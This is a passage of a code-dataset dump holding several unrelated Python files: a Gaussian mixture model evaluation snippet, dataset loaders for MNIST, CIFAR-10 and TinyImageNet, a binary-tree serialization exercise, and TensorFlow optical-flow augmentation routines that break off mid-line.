# Mean and variance of GMM objective \nwhile index < 5:\n k = index * 20\n print(\"The mean and Variance of the GMM Objective for k =\",kArray[index],\"is\", np.mean(lossArray[k:k+20]), \"and:\", np.var(lossArray[k:k+20]))\n index += 1\n\n\"\"\"\nUsing 2 metrics to compare clusters against true labels \n\"\"\"\nadjRand = 0\nfms = 0\ntemp_data = np.append(scaledData, np.array(train_features - 1).reshape((trainLength, 1)), axis=1)\nfor i in range(20):\n predict_array = gmmPred(scaledData, meanArray[60+i], covarianceArray[60+i], lambdaArray[60+i], 36, cols)\n adjRand += adjusted_rand_score(train_data[:, 0], predict_array) #Adjusted Rand Score\n fms += fowlkes_mallows_score(train_data[:, 0], predict_array) #Fowlkes Mallows Score\n\nprint(\"Adjusted Rand Index of the GMM model with k: 36 is\", adjRand/20)\nprint(\"Fowkes Mallows Score of the GMM model with k: 36 is\", fms/20)\n","sub_path":"Mixture Models/GMM.py","file_name":"GMM.py","file_ext":"py","file_size_in_byte":5540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"212110787","text":"import numpy as np\nimport pandas as pd\n\n\ndef add_noise(data, num_features=5, seed=1):\n num_obs = data.shape[0]\n np.random.seed(seed)\n funcs = [np.random.rand, np.random.randn]\n noise = {'noise_' + str(n): np.random.choice(funcs)(num_obs)\n for n in range(num_features)}\n\n if isinstance(data, pd.DataFrame):\n df_noise = pd.DataFrame(noise, index=data.index)\n return pd.concat([data, df_noise], axis=1)\n\n if isinstance(data, np.ndarray):\n raise NotImplementedError\n","sub_path":"eda_tools/data_tools.py","file_name":"data_tools.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"14395374","text":"import sys\n\nsys.path.append(\"tsai.jedi\")\n# from __future__ import print_function\nimport torch\nfrom torchvision import datasets, transforms\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport pickle\nfrom PIL import Image\nfrom torch.utils.data import Dataset, DataLoader\nfrom datatransforms import train_transform_alb, test_transform_alb, train_transform_s11, train_transform_tinyimagenet, \\\n test_transform_tinyimagenet\nimport config\nimport time\nimport cv2\nimport PIL\nimport sklearn\n\ntorch.manual_seed(1)\nkwargs = {'num_workers': config.num_workers, 'pin_memory': config.pin_memory} if config.use_cuda else {}\n\n# MNIST\ntrain_loader_MNIST = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=True, download=True,\n transform=transforms.Compose([\n transforms.RandomRotation((-8.0, 8.0), fill=(1,)),\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=config.batch_size, shuffle=True, **kwargs)\ntest_loader_MNIST = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=config.batch_size, shuffle=True, **kwargs)\n# CIFAR10\ntrain_loader_CIFAR10 = torch.utils.data.DataLoader(\n datasets.CIFAR10('../data', train=True, download=True,\n transform=transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation((-8.0, 8.0)),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))\n ])),\n batch_size=config.batch_size, shuffle=True, **kwargs)\ntest_loader_CIFAR10 = torch.utils.data.DataLoader(\n datasets.CIFAR10('../data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))\n ])),\n batch_size=config.batch_size, shuffle=True, **kwargs)\n\n# CIFAR-10 Albumentation\ndatasets.CIFAR10('../data', train=True, download=True)\n\n\ndef load_cifar10_data(filename):\n with open('../data/cifar-10-batches-py/' + filename, 'rb') as file:\n batch = pickle.load(file, encoding='latin1')\n\n features = batch['data']\n labels = batch['labels']\n return features, labels\n\n\nbatch_1, labels_1 = load_cifar10_data('data_batch_1')\nbatch_2, labels_2 = load_cifar10_data('data_batch_2')\nbatch_3, labels_3 = load_cifar10_data('data_batch_3')\nbatch_4, labels_4 = load_cifar10_data('data_batch_4')\nbatch_5, labels_5 = load_cifar10_data('data_batch_5')\n\ntest, label_test = load_cifar10_data('test_batch')\n\nX_train = np.concatenate([batch_1, batch_2, batch_3, batch_4, batch_5], 0)\nY_train = np.concatenate([labels_1, labels_2, labels_3, labels_4, labels_5], 0)\n\n\ndef return_photo(batch_file):\n assert batch_file.shape[1] == 3072\n dim = np.sqrt(1024).astype(int)\n r = batch_file[:, 0:1024].reshape(batch_file.shape[0], dim, dim, 1)\n g = batch_file[:, 1024:2048].reshape(batch_file.shape[0], dim, dim, 1)\n b = batch_file[:, 2048:3072].reshape(batch_file.shape[0], dim, dim, 1)\n photo = np.concatenate([r, g, b], -1)\n return photo\n\n\nX_train = return_photo(X_train)\nX_test = return_photo(test)\nY_test = np.array(label_test)\n\nclasses_CIFAR10 = ('plane', 'car', 'bird', 'cat',\n 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')\n\ntrainset = train_transform_alb(image_list=X_train, label=Y_train)\ntestset = test_transform_alb(image_list=X_test, label=Y_test)\ntrainset_s11 = train_transform_s11(image_list=X_train, label=Y_train)\n\ntrain_loader_CIFAR10_alb = torch.utils.data.DataLoader(trainset,\n batch_size=config.batch_size, shuffle=True, **kwargs)\n\ntest_loader_CIFAR10_alb = torch.utils.data.DataLoader(testset,\n batch_size=config.batch_size, shuffle=True, **kwargs)\n\ntrain_loader_CIFAR10_s11 = torch.utils.data.DataLoader(trainset_s11,\n batch_size=config.batch_size, shuffle=True, **kwargs)\n\n\n###TinyImagenet\n\ndef get_id_dictionary(path):\n id_dict = {}\n for i, line in enumerate(open(path + 'wnids.txt', 'r')):\n id_dict[line.replace('\\n', '')] = i\n return id_dict\n\n\ndef get_class_to_id_dict(path):\n id_dict = get_id_dictionary()\n all_classes = {}\n result = {}\n for i, line in enumerate(open(path + 'words.txt', 'r')):\n n_id, word = line.replace('\\n', '').split('\\t')[:2]\n all_classes[n_id] = word\n for key, value in id_dict.items():\n result[value] = (key, all_classes[key])\n return result\n\n\ndef get_data(id_dict, path):\n print('starting loading data')\n train_data, test_data = [], []\n train_labels, test_labels = [], []\n t = time.time()\n for key, value in id_dict.items():\n train_data += [cv2.imread(path + 'train/{}/images/{}_{}.JPEG'.format(key, key, str(i))) for i in range(500)]\n train_labels_ = np.array([[0] * 200] * 500)\n train_labels_[:, value] = 1\n train_labels += train_labels_.tolist()\n\n for line in open(path + 'val/val_annotations.txt'):\n img_name, class_id = line.split('\\t')[:2]\n test_data.append(cv2.imread(path + 'val/images/{}'.format(img_name)))\n test_labels_ = np.array([[0] * 200])\n test_labels_[0, id_dict[class_id]] = 1\n test_labels += test_labels_.tolist()\n\n print('finished loading data, in {} seconds'.format(time.time() - t))\n return np.array(train_data), np.array(train_labels), np.array(test_data), np.array(test_labels)\n\n\ntrain_data, train_labels, test_data, test_labels = get_data(get_id_dictionary(path=config.imagenet_path),\n path=config.imagenet_path)\n\ntotal_data = np.concatenate((train_data, test_data), axis=0)\ntotal_labels = np.concatenate((train_labels, test_labels), axis=0)\n\nfrom sklearn.model_selection import train_test_split\n\ntrain_data, test_data, train_labels, test_labels = train_test_split(total_data, total_labels, test_size=0.30,\n random_state=42)\n\ntrain_labels = train_labels.argmax(axis=1)\ntest_labels = test_labels.argmax(axis=1)\n\ntrainset = train_transform_tinyimagenet(image_list=train_data, label=train_labels)\ntrain_loader_tinyimgnet_s12 = torch.utils.data.DataLoader(trainset,\n batch_size=config.batch_size, shuffle=True, **kwargs)\ntestset = test_transform_tinyimagenet(image_list=test_data, label=test_labels)\ntest_loader_tinyimgnet_s12 = torch.utils.data.DataLoader(testset,\n batch_size=config.batch_size, shuffle=True, **kwargs)\n\ndel train_data, train_labels, test_data, test_labels, testset, trainset, total_labels, total_data\n","sub_path":"tsai.jedi/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":7152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"491056832","text":"# Good morning! Here's your coding interview problem for today.\n\n# This problem was asked by Google.\n\n# Given the root to a binary tree, implement serialize(root), which serializes the tree into a string, and deserialize(s), which deserializes the string back into the tree.\n\n# For example, given the following Node class\n\nclass Node:\n def __init__(self, val, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\ndef serialize(root):\n\tres = []\n\tq = [root]\n\twhile len(q) > 0:\n\t\tcurr = q.pop(0)\n\t\tif curr == None:\n\t\t\tres.append(\"*\")\n\t\telse:\n\t\t\tq.append(curr.left)\n\t\t\tq.append(curr.right)\n\t\t\tres.append(curr.val)\n\n\t# s = \"\"\n\t# for ele in res:\n\t# \ts += str(ele)\n\t# \ts += \",\"\n\t# print(s[:-1])\n\t# return s[:-1]\n\treturn res\n\n\ndef deserialize(s, num):\n\t# print(\"s: {}, num: {}\".format(s, num))\n\tif num+1 >= len(s):\n\t\treturn\n\tif s[num-1] == \"*\":\n\t\treturn\n\tl = 2*num\n\tr = 2*num + 1\n\treturn Node(s[num-1], deserialize(s, l), deserialize(s, r))\n\n\ndef main():\n\tn4 = Node(4)\n\tn3 = Node(3, n4)\n\tn2 = Node(2)\n\tn = Node(1, n2, n3)\n\tarr = serialize(n)\n\tnewn = deserialize(arr, 1)\n\ttemp = serialize(newn)\n\tprint(temp)\n\n\tnode = Node('root', Node('left', Node('left.left')), Node('right'))\n\tassert deserialize(serialize(node),1).left.left.val == 'left.left'\n\nif __name__ == '__main__':\n\tmain()","sub_path":"andylou2/07_09_2018.py","file_name":"07_09_2018.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"380387482","text":"import tensorflow as tf\nimport numpy as np\nfrom tensorflow.python.ops import control_flow_ops\n\n\n# Code modified from the following repos/resources:\n# * https://github.com/ppliuboy/SelFlow/blob/master/data_augmentation.py\n# * https://www.wouterbulten.nl/blog/tech/data-augmentation-using-tensorflow-data-dataset/#code\n# * https://github.com/tensorflow/models/blob/master/research/slim/preprocessing/inception_preprocessing.py\n# All rights go to their rightful owner(s)\n\n\ndef apply_with_random_selector(x, func, num_cases):\n \"\"\"Computes func(x, sel), with sel sampled from [0...num_cases-1].\n Args:\n x: input Tensor.\n func: Python function to apply.\n num_cases: Python int32, number of cases to sample sel from.\n Returns:\n The result of func(x, sel), where func receives the value of the\n selector as a python integer, but sel is sampled dynamically.\n \"\"\"\n sel = tf.random_uniform([], maxval=num_cases, dtype=tf.int32)\n # Pass the real x only to one of the func calls.\n return control_flow_ops.merge([\n func(control_flow_ops.switch(x, tf.equal(sel, case))[1], case)\n for case in range(num_cases)])[0]\n\n\ndef distort_colour_zero(image, dist_params):\n image = tf.image.random_brightness(image, max_delta=dist_params['max_delta_brightness'] / 255.)\n image = tf.image.random_saturation(image, lower=dist_params['lower_saturation'],\n upper=dist_params['upper_saturation'])\n image = tf.image.random_hue(image, max_delta=dist_params['max_delta_hue'])\n image = tf.image.random_contrast(image, lower=dist_params['lower_contrast'], upper=dist_params['upper_contrast'])\n return image\n\n\ndef distort_colour_one(image, dist_params):\n image = tf.image.random_saturation(image, lower=dist_params['lower_saturation'],\n upper=dist_params['upper_saturation'])\n image = tf.image.random_brightness(image, max_delta=dist_params['max_delta_brightness'] / 255.)\n image = tf.image.random_contrast(image, lower=dist_params['lower_contrast'], upper=dist_params['upper_contrast'])\n image = tf.image.random_hue(image, max_delta=dist_params['max_delta_hue'])\n return image\n\n\ndef distort_colour_two(image, dist_params):\n image = tf.image.random_contrast(image, lower=dist_params['lower_contrast'], upper=dist_params['upper_contrast'])\n image = tf.image.random_hue(image, max_delta=dist_params['max_delta_hue'])\n image = tf.image.random_brightness(image, max_delta=dist_params['max_delta_brightness'] / 255.)\n image = tf.image.random_saturation(image, lower=dist_params['lower_saturation'],\n upper=dist_params['upper_saturation'])\n return image\n\n\ndef distort_colour_three(image, dist_params):\n image = tf.image.random_hue(image, max_delta=dist_params['max_delta_hue'])\n image = tf.image.random_saturation(image, lower=dist_params['lower_saturation'],\n upper=dist_params['upper_saturation'])\n image = tf.image.random_contrast(image, lower=dist_params['lower_contrast'], upper=dist_params['upper_contrast'])\n image = tf.image.random_brightness(image, max_delta=dist_params['max_delta_brightness'] / 255.)\n return image\n\n\n# We keep it as is as colour distortions can only be applied to img1 and optionally img2 (if we use image pairs)\ndef distort_colour(image, num_permutations=4):\n distortion_params = {'max_delta_brightness': 51., # around 0.2 specified in FlowNet2.0\n 'lower_saturation': 0.5, # FN2 samples from [0.5, 2] (halving/doubling saturation)\n 'upper_saturation': 1.5,\n 'max_delta_hue': 0.2, # FN2 samples randomly for gamma instead\n 'lower_contrast': 0.2, # in flownet is [-0.8, 0.4] for a range of [-1, 1]?\n 'upper_contrast': 1.4}\n\n colour_id = tf.random_uniform([], maxval=num_permutations, dtype=tf.int32)\n # image = tf.switch_case(colour_id, branch_fns={\n # 0: lambda: distort_colour_zero(image, dist_params=distortion_params),\n # 1: lambda: distort_colour_one(image, dist_params=distortion_params),\n # 2: lambda: distort_colour_two(image, dist_params=distortion_params),\n # 3: lambda: distort_colour_three(image, dist_params=distortion_params)},\n # default=lambda: distort_colour_zero(image, dist_params=distortion_params))\n\n image = tf.case(\n {tf.equal(colour_id, tf.constant(0)): lambda: distort_colour_zero(image, dist_params=distortion_params),\n tf.equal(colour_id, tf.constant(1)): lambda: distort_colour_one(image, dist_params=distortion_params),\n tf.equal(colour_id, tf.constant(2)): lambda: distort_colour_two(image, dist_params=distortion_params),\n tf.equal(colour_id, tf.constant(3)): lambda: distort_colour_three(image, dist_params=distortion_params),\n },\n default=lambda: distort_colour_zero(image, dist_params=distortion_params), exclusive=True)\n # The random_* ops do not necessarily clamp.\n return tf.clip_by_value(image, 0.0, 1.0)\n\n\n# Note: not used ATM due to mismatch in net dimensions (first conv) in validation and training (tf.AUTO_REUSE)\ndef random_crop(img_list, crop_h, crop_w):\n img_size = tf.shape(img_list[0])\n # crop image and flow\n rand_offset_h = tf.random_uniform([], 0, img_size[0] - crop_h + 1, dtype=tf.int32)\n rand_offset_w = tf.random_uniform([], 0, img_size[1] - crop_w + 1, dtype=tf.int32)\n\n for i, img in enumerate(img_list):\n img_list[i] = tf.image.crop_to_bounding_box(img, rand_offset_h, rand_offset_w, crop_h, crop_w)\n\n return img_list\n\n\ndef flow_vertical_flip(flow):\n flow = tf.image.flip_up_down(flow)\n flow_u, flow_v = tf.unstack(flow, axis=-1)\n flow_v = flow_v * -1\n flow = tf.stack([flow_u, flow_v], axis=-1)\n return flow\n\n\ndef flow_horizontal_flip(flow):\n flow = tf.image.flip_left_right(flow)\n flow_u, flow_v = tf.unstack(flow, axis=-1)\n flow_u = flow_u * -1\n flow = tf.stack([flow_u, flow_v], axis=-1)\n return flow\n\n\ndef random_flip(img_list):\n is_flip = tf.random_uniform([2], minval=0, maxval=2, dtype=tf.int32)\n\n for i in range(len(img_list)):\n img_list[i] = tf.where(is_flip[0] > 0, tf.image.flip_left_right(img_list[i]), img_list[i])\n img_list[i] = tf.where(is_flip[1] > 0, tf.image.flip_up_down(img_list[i]), img_list[i])\n return img_list\n\n\ndef random_flip_with_flow(img_list, flow_list):\n is_flip = tf.random_uniform([2], minval=0, maxval=2, dtype=tf.int32)\n for i in range(len(img_list)):\n img_list[i] = tf.where(is_flip[0] > 0, tf.image.flip_left_right(img_list[i]), img_list[i])\n img_list[i] = tf.where(is_flip[1] > 0, tf.image.flip_up_down(img_list[i]), img_list[i])\n for i in range(len(flow_list)):\n flow_list[i] = tf.where(is_flip[0] > 0, flow_horizontal_flip(flow_list[i]), flow_list[i])\n flow_list[i] = tf.where(is_flip[1] > 0, flow_vertical_flip(flow_list[i]), flow_list[i])\n return img_list, flow_list\n\n\ndef random_channel_swap(img_list):\n channel_permutation = tf.constant([[0, 1, 2],\n [0, 2, 1],\n [1, 0, 2],\n [1, 2, 0],\n [2, 0, 1],\n [2, 1, 0]])\n rand_i = tf.random_uniform([], minval=0, maxval=6, dtype=tf.int32)\n permutation = channel_permutation[rand_i]\n\n for i in range(len(img_list)):\n img = img_list[i]\n channel_1 = img[:, :, permutation[0]]\n channel_2 = img[:, :, permutation[1]]\n channel_3 = img[:, :, permutation[2]]\n img_list[i] = tf.stack([channel_1, channel_2, channel_3], axis=-1)\n return img_list\n\n\ndef random_channel_swap_single(image):\n channel_permutation = tf.constant([[0, 1, 2],\n [0, 2, 1],\n [1, 0, 2],\n [1, 2, 0],\n [2, 0, 1],\n [2, 1, 0]])\n rand_i = tf.random_uniform([], minval=0, maxval=6, dtype=tf.int32)\n permutation = channel_permutation[rand_i]\n channel_1 = image[:, :, permutation[0]]\n channel_2 = image[:, :, permutation[1]]\n channel_3 = image[:, :, permutation[2]]\n image = tf.stack([channel_1, channel_2, channel_3], axis=-1)\n return image\n\n\ndef flow_resize(flow, out_size, is_scale=True, method=0):\n \"\"\"\n method: 0 mean bilinear, 1 means nearest, 2 bicubic and 3 area\n See: https://www.tensorflow.org/api_docs/python/tf/image/ResizeMethod\n \"\"\"\n flow_size = tf.to_float(tf.shape(flow)[-3:-1])\n flow = tf.image.resize_images(flow, out_size, method=method, align_corners=True)\n if is_scale:\n scale = tf.to_float(out_size) / flow_size\n scale = tf.stack([scale[1], scale[0]])\n flow = tf.multiply(flow, scale)\n return flow\n\n\n# Auxiliar functions for sampling\ndef case_sparse(num_cases=2):\n density_id = tf.random_uniform([], maxval=num_cases, dtype=tf.int32)\n density = tf.case(\n {tf.equal(density_id, tf.constant(0)): lambda: tf.random_uniform([], minval=0.01, maxval=1., dtype=tf.float32),\n tf.equal(density_id, tf.constant(1)): lambda: tf.random_uniform([], minval=1., maxval=10., dtype=tf.float32),\n },\n default=lambda: tf.random_uniform([], minval=1., maxval=10., dtype=tf.float32), exclusive=True)\n return density, density_id\n\n\ndef case_dense(num_cases=4, ff_like=-1):\n density_id = tf.random_uniform([], maxval=num_cases, dtype=tf.int32)\n ff_like_bool = tf.cond(tf.greater(tf.convert_to_tensor(ff_like), tf.constant(0)),\n lambda: tf.constant(True), lambda: tf.constant(False))\n density = tf.case(\n {tf.logical_and(tf.equal(density_id, tf.constant(0)), tf.equal(ff_like_bool, tf.constant(False))):\n lambda: tf.random_uniform([], minval=10., maxval=25., dtype=tf.float32),\n tf.logical_and(tf.equal(density_id, tf.constant(1)), tf.equal(ff_like_bool, tf.constant(False))):\n lambda: tf.random_uniform([], minval=25., maxval=50., dtype=tf.float32),\n tf.logical_and(tf.equal(density_id, tf.constant(2)), tf.equal(ff_like_bool, tf.constant(False))):\n lambda: tf.random_uniform([], minval=50., maxval=75., dtype=tf.float32),\n tf.logical_and(tf.equal(density_id, tf.constant(3)), tf.equal(ff_like_bool, tf.constant(False))):\n lambda: tf.random_uniform([], minval=75., maxval=90., dtype=tf.float32),\n tf.equal(ff_like_bool, tf.constant(True)): lambda: tf.random_uniform([], minval=65., maxval=85.,\n dtype=tf.float32),\n },\n default=lambda: tf.random_uniform([], minval=25., maxval=50., dtype=tf.float32), exclusive=True)\n return density, density_id\n\n\ndef get_sampling_density(dense_or_sparse, num_ranges=(4, 2), ff_like=-1):\n density, density_id = tf.cond(tf.greater(dense_or_sparse, tf.constant(0)),\n lambda: case_dense(num_cases=num_ranges[0], ff_like=ff_like),\n lambda: case_sparse(num_cases=num_ranges[1]))\n tf.summary.scalar('debug/density_id', density_id)\n return density\n\n\ndef get_random_offset_and_crop(image_shape, density):\n \"\"\"\n computes random crop sizes and offsets for a given image_shape (height, width) and sampling density\n :param image_shape:\n :param density:\n :return:\n \"\"\"\n p_fill = tf.divide(density, 100.0) # target_density expressed in %\n bbox_area = tf.multiply(p_fill, tf.cast(tf.multiply(image_shape[0], image_shape[1]), dtype=tf.float32))\n num_aspect_ratios = 5\n aspect_ratios = tf.constant([16 / 9, 4 / 3, 3 / 2, 3 / 1, 4 / 5])\n aspect_id = tf.random_uniform([], maxval=num_aspect_ratios, dtype=tf.int32)\n aspect_ratio = aspect_ratios[aspect_id]\n # Compute width and height based of random aspect ratio and bbox area\n # bbox = w * h, AR = w/h\n\n # Check crop dimensions are plausible, otherwise crop them to fit (this alters the density we were sampling at)\n crop_w = tf.cast(tf.round(tf.sqrt(tf.multiply(tf.cast(bbox_area, dtype=tf.float32), aspect_ratio))), dtype=tf.int32)\n crop_h = tf.cast(tf.round(tf.divide(tf.cast(crop_w, dtype=tf.float32), aspect_ratio)), dtype=tf.int32)\n\n # Check crop dimensions are plausible, otherwise crop them to fit (this alters the density we were sampling at)\n crop_h = tf.cond(tf.greater(crop_h, tf.constant(image_shape[0])),\n lambda: tf.constant(image_shape[0] - 1), lambda: crop_h)\n crop_w = tf.cond(tf.greater(crop_w, tf.constant(image_shape[1])),\n lambda: tf.constant(image_shape[1] - 1), lambda: crop_w)\n\n rand_offset_h = tf.random_uniform([], 0, image_shape[0] - crop_h + 1, dtype=tf.int32)\n rand_offset_w = tf.random_uniform([], 0, image_shape[1] - crop_w + 1, dtype=tf.int32)\n\n return rand_offset_h, rand_offset_w, crop_h, crop_w\n\n\ndef set_range_to_zero(matches, width, offset_h, offset_w, crop_h, crop_w):\n range_rows = tf.range(offset_h, offset_h + crop_h, dtype=tf.int32)\n range_cols = tf.range(offset_w, offset_w + crop_w, dtype=tf.int32)\n rows, cols = tf.meshgrid(range_rows, range_cols)\n rows_flatten = tf.reshape(rows, [-1])\n cols_flatten = tf.reshape(cols, [-1])\n\n # Get absolute indices as rows * width + cols\n indices = tf.add(tf.multiply(rows_flatten, width), cols_flatten)\n zeros = tf.zeros(tf.shape(indices), dtype=tf.float32)\n matches = tf.scatter_update(matches, indices, zeros)\n # numpy: matches[rand_offset_h:rand_offset_h + crop_h, rand_offset_w: rand_offset_w + crop_w] = 0\n return matches\n\n\ndef body(matches, density, height, width): # what to do once the while loop condition is met\n matches, density, height, width = corrupt_sparse_flow_once(matches, density, height, width)\n return matches, density, height, width\n\n\ndef cond(matches, density, height, width):\n return tf.greater(tf.random_uniform([], maxval=2, dtype=tf.int32), 0)\n\n\ndef corrupt_sparse_flow_loop(matches, density, height=384, width=512):\n # Perturbate always once (at least)\n matches = corrupt_sparse_flow_once(matches, density, height, width)\n # TODO: the loop does not work with the following error:\n # TypeError: List of Tensors when single Tensor expected (try in the future)\n # For now, randomly corrupt a second time (if applies)\n # Draw a random number within 0, 1. If 1, keep corrupting the sparse flow (matches mask) with holes\n # inputs = [matches, density, height, width]\n # c = lambda ins: cond(ins)\n # b = lambda ins: body(ins)\n # matches, density, height, width = tf.while_loop(cond, body, [matches, density, height, width])\n # result is (matches, density, height, width) where all have not been changed but matches\n # matches = result[0]\n matches = tf.cond(tf.greater(tf.random_uniform([], maxval=2, dtype=tf.int32), 0),\n lambda: corrupt_sparse_flow_once(matches, density, height, width),\n lambda: return_identity_one(matches))\n\n return matches\n\n\ndef corrupt_sparse_flow_once(matches, density, height=384, width=512):\n # Assumption: matches is already a flatten array\n inv_fraction = tf.random_uniform([], minval=4., maxval=12., dtype=tf.float32)\n rand_offset_h, rand_offset_w, crop_h, crop_w = get_random_offset_and_crop((height, width),\n tf.divide(density, inv_fraction))\n matches = set_range_to_zero(matches, width, rand_offset_h, rand_offset_w, crop_h, crop_w)\n return matches\n\n\ndef return_identity(x, y):\n return tf.identity(x), tf.identity(y)\n\n\ndef return_identity_one(x):\n return tf.identity(x)\n\n\ndef mask_to_sparse_flow(sampling_mask, gt_flow):\n # Assumption, sampling_mask is (height x width) (int32), equivalent to matches but in int32 and in 2D (not 3D)\n sampling_mask = sampling_mask[:, :, tf.newaxis]\n sampling_mask_rep = tf.tile(sampling_mask, [1, 1, 2])\n sampling_mask_flatten = tf.reshape(sampling_mask_rep, [-1])\n sampling_mask_flatten_where = tf.where(tf.equal(sampling_mask_flatten, 1))\n sampling_mask_flatten_where = tf.reshape(sampling_mask_flatten_where, [-1])\n\n gt_flow_flatten = tf.reshape(gt_flow, [-1])\n gt_flow_sampling_mask = tf.boolean_mask(gt_flow_flatten, tf.equal(sampling_mask_flatten, 1))\n zeros = lambda: tf.zeros(tf.reduce_prod(gt_flow.shape), dtype=tf.float32)\n sparse_flow = tf.Variable(initial_value=zeros, dtype=tf.float32, trainable=False)\n sparse_flow = tf.scatter_update(sparse_flow, sampling_mask_flatten_where, gt_flow_sampling_mask)\n sparse_flow = tf.reshape(sparse_flow, gt_flow.shape)\n return sparse_flow\n\n\ndef perturbate_dm_matches(dm_matches, dm_flow, density):\n # Pick random num_picks from matches_indices randomly and set them to 0 (and the flow to 0.0)\n percentage = 10\n height, width, _ = dm_matches.get_shape().as_list()\n percentage2perturbate = tf.random_uniform([], minval=percentage - percentage/4, maxval=percentage + percentage/4,\n dtype=tf.float32)\n percentage_of_density = tf.multiply(tf.divide(percentage2perturbate, 100.0), density)\n p_zeros = tf.divide(percentage_of_density, 100.0)\n perturbating_mask = tf.multinomial(tf.log([[p_zeros, 1 - p_zeros]]), height * width, output_dtype=tf.int32)\n perturbating_mask = tf.reshape(perturbating_mask, (height, width))\n perturbated_mask = tf.cast(tf.multiply(tf.reshape(dm_matches, (height, width)), perturbating_mask), dtype=tf.int32)\n matches = tf.cast(tf.expand_dims(perturbated_mask, -1), dtype=tf.float32)\n\n sparse_flow = mask_to_sparse_flow(sampling_mask=perturbated_mask, gt_flow=dm_flow)\n\n return matches, sparse_flow\n\n\ndef random_perturbation_dm_matches(dm_matches, dm_flow, density):\n aux_choice = tf.random_uniform([], maxval=2, dtype=tf.int32) # 0 or 1\n dm_matches, dm_flow = tf.cond(tf.greater(aux_choice, tf.constant(0)), lambda: perturbate_dm_matches(dm_matches,\n dm_flow,\n density),\n lambda: return_identity(dm_matches, dm_flow))\n\n return dm_matches, dm_flow\n\n\n# TODO: not working at the moment, yielding some weird results (offset grids with multiple, non-regular crossings)\n# Careful, TB subsamples images when showing smaller image, click on it to check original size (binary images change\n# drastically\ndef sample_sparse_grid_like(gt_flow, target_density=75, height=384, width=512):\n print(\"sample_sparse_grid_like\")\n # Important: matches is already normalised to [0, 1]\n num_samples = tf.multiply(tf.multiply(tf.divide(target_density, 100.0), height), width)\n aspect_ratio = tf.divide(width, height)\n # Compute as in invalid_like for a random box to know the number of samples in horizontal and vertical\n num_samples_w = tf.cast(tf.round(tf.sqrt(tf.multiply(num_samples, aspect_ratio))),\n dtype=tf.int32)\n num_samples_h = tf.cast(tf.round(tf.divide(tf.cast(num_samples_w, dtype=tf.float32), aspect_ratio)),\n dtype=tf.int32)\n # Check crop dimensions are plausible, otherwise crop them to fit (this alters the density we were sampling at)\n num_samples_h = tf.cond(\n tf.greater(num_samples_h, tf.constant(height)), lambda: tf.constant(height, dtype=tf.int32),\n lambda: num_samples_h)\n num_samples_w = tf.cond(\n tf.greater(num_samples_w, tf.constant(width)), lambda: tf.constant(width, dtype=tf.int32),\n lambda: num_samples_w)\n\n delta_rows = tf.cast((height - 1 - 0) / num_samples_h, tf.float32)\n sample_points_h = tf.cast(tf.round(tf.range(start=0, limit=height, delta=delta_rows, dtype=tf.float32)),\n dtype=tf.int32)\n delta_cols = tf.cast((width - 1 - 0) / num_samples_w, tf.float32)\n sample_points_w = tf.cast(tf.round(tf.range(start=0, limit=width, delta=delta_cols, dtype=tf.float32)),\n dtype=tf.int32)\n # Create meshgrid of all combinations (i.e.: coordinates to sample at)\n rows, cols = tf.meshgrid(sample_points_h, sample_points_w, indexing='ij')\n rows_flatten = tf.reshape(rows, [-1])\n cols_flatten = tf.reshape(cols, [-1])\n\n # Compute absolute indices as row * width + cols\n indices = tf.add(tf.multiply(rows_flatten, width), cols_flatten)\n ones = tf.ones(tf.shape(indices), dtype=tf.float32)\n zeros = lambda: tf.zeros((height * width), dtype=tf.float32)\n matches = tf.Variable(initial_value=zeros, trainable=False)\n\n matches = tf.scatter_update(matches, indices, ones) # all 1D tensors\n\n # Randomly subtract a part with a random rectangle (superpixels in the future)\n corrupt_mask = tf.random_uniform([], maxval=2, dtype=tf.int32)\n matches = tf.cond(tf.greater(corrupt_mask, tf.constant(0)), lambda: corrupt_sparse_flow_once(matches, target_density,\n height, width),\n lambda: return_identity_one(matches))\n\n sampling_mask = tf.reshape(matches, (height, width)) # sampling_mask of size (h, w)\n matches = tf.cast(tf.expand_dims(sampling_mask, -1), dtype=tf.float32) # convert to (h, w, 1)\n # Sample ground truth flow with given map\n # sampling_mask = sampling_mask[:, :, tf.newaxis]\n # sampling_mask_rep = tf.tile(sampling_mask, [1, 1, 2])\n # sampling_mask_flatten = tf.reshape(sampling_mask_rep, [-1])\n # sampling_mask_flatten_where = tf.where(\n # tf.equal(sampling_mask_flatten, tf.cast(1, dtype=sampling_mask_flatten.dtype)))\n # sampling_mask_flatten_where = tf.reshape(sampling_mask_flatten_where, [-1])\n #\n # gt_flow_sampling_mask = tf.boolean_mask(gt_flow, sampling_mask_rep)\n # zeros = lambda: tf.zeros(tf.reduce_prod(gt_flow.shape), dtype=tf.float32)\n # sparse_flow = tf.Variable(initial_value=zeros, dtype=tf.float32, trainable=False)\n # sparse_flow = tf.scatter_update(sparse_flow, sampling_mask_flatten_where, gt_flow_sampling_mask)\n # sparse_flow = tf.reshape(sparse_flow, gt_flow.shape)\n sparse_flow = mask_to_sparse_flow(sampling_mask, gt_flow)\n\n return matches, sparse_flow\n\n\ndef sample_sparse_uniform(gt_flow, target_density=75, height=384, width=512):\n print(\"sample_sparse_uniform\")\n p_fill = tf.divide(target_density, 100.0)\n samples = tf.multinomial(tf.log([[1 